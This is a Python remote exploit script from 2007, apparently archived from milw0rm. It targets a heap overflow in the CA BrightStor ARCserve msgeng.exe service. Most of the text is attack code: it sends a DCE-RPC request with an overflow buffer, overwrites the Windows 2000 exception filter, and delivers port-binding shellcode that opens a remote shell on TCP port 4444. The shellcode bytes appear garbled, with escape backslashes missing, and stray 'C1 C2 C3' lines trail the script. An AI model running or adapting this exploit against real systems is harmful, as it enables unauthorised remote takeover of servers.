CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit :

Date : 2007-01-27 Author : Winny Thomas
#!/usr/bin/python
# I couldnt find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on windows 2000 SP0. Opens a shell on TCP port 4444. Shouldnt be hard
# to port to other platforms. The exploit overwrites the
# UnhandledExceptionFilter in windows 2000 SP0 (located at 77EE044C) with the
# address of call dword ptr [esi +4C] located in user32.dll. At the time when
# UEF is called esi +4C contains a pointer to our shellcode.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code

from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys

def DCEconnectAndExploit(target):
       trans = transport.TCPTransport(target, 6503)
       trans.connect()
       dce = dcerpc.DCERPC_v5(trans)
       dce.bind(uuid.uuidtup_to_bin(('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')))

       request = "A" * 676
       request += "x90x90x90x90"
       request += "x90x90xebx0a"

       #Call dword ptr [esi +4C] from user32.dll
       request += struct.pack("<L", 0x77E4FB7A)
       #Overwrite UnhandledExceptionFilter in Windows 2000 SP0
       request += struct.pack("<L", 0x77EE044C)
       request += "x90x90x90x90" * 2
       #Portbinding shellcode; Opens shell on TCP port 4444
       request += "x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13xe0"
       request += "x6fxe3x2ax83xebxfcxe2xf4x1cx05x08x67x08x96x1cxd5"
       request += "x1fx0fx68x46xc4x4bx68x6fxdcxe4x9fx2fx98x6ex0cxa1"
       request += "xafx77x68x75xc0x6ex08x63x6bx5bx68x2bx0ex5ex23xb3"
       request += "x4cxebx23x5exe7xaex29x27xe1xadx08xdexdbx3bxc7x02"
       request += "x95x8ax68x75xc4x6ex08x4cx6bx63xa8xa1xbfx73xe2xc1"
       request += "xe3x43x68xa3x8cx4bxffx4bx23x5ex38x4ex6bx2cxd3xa1"
       request += "xa0x63x68x5axfcxc2x68x6axe8x31x8bxa4xaex61x0fx7a"
       request += "x1fxb9x85x79x86x07xd0x18x88x18x90x18xbfx3bx1cxfa"
       request += "x88xa4x0exd6xdbx3fx1cxfcxbfxe6x06x4cx61x82xebx28"
       request += "xb5x05xe1xd5x30x07x3ax23x15xc2xb4xd5x36x3cxb0x79"
       request += "xb3x3cxa0x79xa3x3cx1cxfax86x07xf2x76x86x3cx6axcb"
       request += "x75x07x47x30x90xa8xb4xd5x36x05xf3x7bxb5x90x33x42"
       request += "x44xc2xcdxc3xb7x90x35x79xb5x90x33x42x05x26x65x63"
       request += "xb7x90x35x7axb4x3bxb6xd5x30xfcx8bxcdx99xa9x9ax7d"
       request += "x1fxb9xb6xd5x30x09x89x4ex86x07x80x47x69x8ax89x7a"
       request += "xb9x46x2fxa3x07x05xa7xa3x02x5ex23xd9x4ax91xa1x07"
       request += "x1ex2dxcfxb9x6dx15xdbx81x4bxc4x8bx58x1exdcxf5xd5"
       request += "x95x2bx1cxfcxbbx38xb1x7bxb1x3ex89x2bxb1x3exb6x7b"
       request += "x1fxbfx8bx87x39x6ax2dx79x1fxb9x89xd5x1fx58x1cxfa"
       request += "x6bx38x1fxa9x24x0bx1cxfcxb2x90x33x42x10xe5xe7x75"
       request += "xb3x90x35xd5x30x6fxe3x2a"

       dce.call(43, request)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <target ip>
' % sys.argv[0]
               sys.exit(-1)

       DCEconnectAndExploit(target)

# milw0rm.com [2007-01-27]

C1

 

C2

 

C3